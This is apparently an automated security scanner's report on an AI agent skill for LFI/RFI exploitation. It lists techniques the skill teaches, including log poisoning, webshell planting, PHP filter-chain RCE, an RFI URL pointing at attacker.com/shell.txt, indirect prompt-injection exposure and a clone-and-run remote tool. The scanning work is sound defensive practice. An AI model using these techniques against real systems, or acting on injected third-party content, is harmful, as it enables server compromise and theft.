lfi-rfi-methodology

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This content is an explicit offensive exploit methodology—detailing LFI/RFI to achieve remote code execution, log poisoning and User‑Agent payload injection, writing persistent webshells (e.g. /var/www/html/s.php), using pearcmd.php to write files, php:// wrappers and filter‑chain RCE, session file race attacks, and remote file inclusion to attacker servers—i.e. step‑by‑step instructions for data exfiltration, arbitrary command execution and persistent backdoor installation.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.90). The skill's required workflow (references/lfi-to-rce.md and SKILL.md/AGENT.md) instructs the agent to fetch and include content from external/untrusted web targets (e.g., curl to read target logs like /var/log/apache2/access.log, include LFI/RFI URLs such as ?file=http://attacker.com/shell.txt, and to inspect responses), meaning the agent will ingest and act on arbitrary third-party content that can change subsequent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill explicitly instructs cloning and running a remote repository at https://github.com/synacktiv/php_filter_chain_generator.git (git clone ...; python3 php_filter_chain_generator.py), which is a runtime fetch that executes remote code and is presented as a required tool for the PHP filter-chain technique.